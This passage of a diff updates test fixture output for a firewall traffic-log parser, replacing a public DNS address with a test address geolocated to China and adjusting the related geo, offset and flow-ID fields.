-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -1357,7 +1316,7 @@
         "event.end": "2018-11-30T16:08:52.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:08:52.000-02:00",
         "event.timezone": "-02:00",
@@ -1369,12 +1328,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 5629,
+        "log.offset": 5689,
         "network.application": "dns",
         "network.bytes": 186,
         "network.community_id": [
-            "1:WbAIgVVT23pzqAJkSDF68HGSPY4=",
-            "1:ewaPydF3S4wOU8oEi8ykj+ETSIY="
+            "1:IbMAPI2u73wwPw/13/OGzLYogKE=",
+            "1:difgeoigC1UX5MzBPcE93MzIaZA="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -1391,12 +1350,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24107",
-        "panw.panos.network.nat.community_id": "1:ewaPydF3S4wOU8oEi8ykj+ETSIY=",
+        "panw.panos.network.nat.community_id": "1:IbMAPI2u73wwPw/13/OGzLYogKE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091124,
         "panw.panos.source.interface": "ethernet1/2",
@@ -1411,14 +1370,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.207",
-            "8.8.8.8"
+            "192.168.15.207"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 117,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -1443,17 +1402,18 @@
         "client.nat.port": 2987,
         "client.packets": 1,
         "client.port": 54061,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 307,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -1467,7 +1427,7 @@
         "event.end": "2018-11-30T16:08:52.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:08:52.000-02:00",
         "event.timezone": "-02:00",
@@ -1479,12 +1439,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 6078,
+        "log.offset": 6148,
         "network.application": "dns",
         "network.bytes": 392,
         "network.community_id": [
-            "1:+6FjOLCCWY+JDxSWKn7tYpAXksA=",
-            "1:b+lWViOjpbOZConz3JzrSDR609Q="
+            "1:gyqXSPK4UfpIaavm5ElvzpaQJAs=",
+            "1:rukFlCTeT6g0aD5WOkvZ1QaFQrQ="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -1501,12 +1461,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24063",
-        "panw.panos.network.nat.community_id": "1:+6FjOLCCWY+JDxSWKn7tYpAXksA=",
+        "panw.panos.network.nat.community_id": "1:gyqXSPK4UfpIaavm5ElvzpaQJAs=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091125,
         "panw.panos.source.interface": "ethernet1/2",
@@ -1521,14 +1481,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.207",
-            "8.8.8.8"
+            "192.168.15.207"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 307,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -1553,17 +1513,18 @@
         "client.nat.port": 6945,
         "client.packets": 1,
         "client.port": 52701,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 365,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -1577,7 +1538,7 @@
         "event.end": "2018-11-30T16:08:52.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:08:52.000-02:00",
         "event.timezone": "-02:00",
@@ -1589,12 +1550,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 6526,
+        "log.offset": 6606,
         "network.application": "dns",
         "network.bytes": 440,
         "network.community_id": [
-            "1:dnGaTG13rwIh66+Pj0GQSdJMhu8=",
-            "1:rR5F8eZHI1nwmznedxqG9e8vUQE="
+            "1:DPokRa42hI+2E3a2DWdKPltL/Hs=",
+            "1:TG8yX3XeuNWXzsGRmRkB5EraqBM="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -1611,12 +1572,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24145",
-        "panw.panos.network.nat.community_id": "1:rR5F8eZHI1nwmznedxqG9e8vUQE=",
+        "panw.panos.network.nat.community_id": "1:TG8yX3XeuNWXzsGRmRkB5EraqBM=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091126,
         "panw.panos.source.interface": "ethernet1/2",
@@ -1631,14 +1592,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.207",
-            "8.8.8.8"
+            "192.168.15.207"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 365,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -1663,17 +1624,18 @@
         "client.nat.port": 0,
         "client.packets": 6,
         "client.port": 0,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 588,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 6,
         "destination.port": 0,
@@ -1687,7 +1649,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -1699,12 +1661,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 6974,
+        "log.offset": 7064,
         "network.application": "ping",
         "network.bytes": 1176,
         "network.community_id": [
-            "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
-            "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+            "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+            "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
         ],
         "network.direction": "outbound",
         "network.packets": 12,
@@ -1721,12 +1683,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 0,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24245",
-        "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+        "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091127,
         "panw.panos.source.interface": "ethernet1/2",
@@ -1741,14 +1703,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 588,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 6,
         "server.port": 0,
@@ -1773,17 +1735,18 @@
         "client.nat.port": 42208,
         "client.packets": 1,
         "client.port": 62503,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 161,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -1797,7 +1760,7 @@
         "event.end": "2018-11-30T16:08:55.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:08:54.000-02:00",
         "event.timezone": "-02:00",
@@ -1809,12 +1772,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 7418,
+        "log.offset": 7518,
         "network.application": "dns",
         "network.bytes": 258,
         "network.community_id": [
-            "1:81Mi4MwpmNYtUrc7CMJH0MPRelU=",
-            "1:Jof66SUOY3j4C+WrZwbgtKls1/Y="
+            "1:26TJuKDYd30VKSNqMturHXRN7aU=",
+            "1:LxppHna9qJmqS3k5notTeotpkFE="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -1831,12 +1794,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24167",
-        "panw.panos.network.nat.community_id": "1:81Mi4MwpmNYtUrc7CMJH0MPRelU=",
+        "panw.panos.network.nat.community_id": "1:26TJuKDYd30VKSNqMturHXRN7aU=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091128,
         "panw.panos.source.interface": "ethernet1/2",
@@ -1851,14 +1814,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 161,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -1884,14 +1847,7 @@
         "client.packets": 14,
         "client.port": 52442,
         "destination.address": "98.138.49.44",
-        "destination.as.number": 36646,
-        "destination.as.organization.name": "Oath Holdings Inc.",
         "destination.bytes": 7805,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "98.138.49.44",
         "destination.nat.ip": "98.138.49.44",
         "destination.nat.port": 443,
@@ -1919,7 +1875,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 7867,
+        "log.offset": 7977,
         "network.application": "ssl",
         "network.bytes": 9891,
         "network.community_id": [
@@ -1994,14 +1950,7 @@
         "client.packets": 13,
         "client.port": 52441,
         "destination.address": "72.30.3.43",
-        "destination.as.number": 26101,
-        "destination.as.organization.name": "Oath Holdings Inc.",
         "destination.bytes": 6106,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "72.30.3.43",
         "destination.nat.ip": "72.30.3.43",
         "destination.nat.port": 443,
@@ -2029,7 +1978,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 8350,
+        "log.offset": 8460,
         "network.application": "ssl",
         "network.bytes": 8460,
         "network.community_id": [
@@ -2103,17 +2052,18 @@
         "client.nat.port": 0,
         "client.packets": 2,
         "client.port": 0,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 196,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 2,
         "destination.port": 0,
@@ -2127,7 +2077,7 @@
         "event.end": "2018-11-30T16:09:15.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:15.000-02:00",
         "event.timezone": "-02:00",
@@ -2139,12 +2089,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 8829,
+        "log.offset": 8939,
         "network.application": "ping",
         "network.bytes": 392,
         "network.community_id": [
-            "1:/l9vT9UwjkUeC6vNW93wy71+TBk=",
-            "1:QVXHpdoObbzEeqP6DGULYxqYgAY="
+            "1:CuvJ9gIwhrK2dxa778UoOqidePk=",
+            "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE="
         ],
         "network.direction": "outbound",
         "network.packets": 4,
@@ -2161,12 +2111,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 0,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24185",
-        "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+        "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091131,
         "panw.panos.source.interface": "ethernet1/2",
@@ -2181,14 +2131,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.196",
-            "8.8.8.8"
+            "192.168.15.196"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 196,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 2,
         "server.port": 0,
@@ -2214,14 +2164,7 @@
         "client.packets": 19,
         "client.port": 52355,
         "destination.address": "172.217.9.142",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 3245,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.9.142",
         "destination.nat.ip": "172.217.9.142",
         "destination.nat.port": 80,
@@ -2249,7 +2192,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 9271,
+        "log.offset": 9391,
         "network.application": "ocsp",
         "network.bytes": 5790,
         "network.community_id": [
@@ -2323,17 +2266,18 @@
         "client.nat.port": 24430,
         "client.packets": 1,
         "client.port": 50196,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 179,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -2347,7 +2291,7 @@
         "event.end": "2018-11-30T16:08:57.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
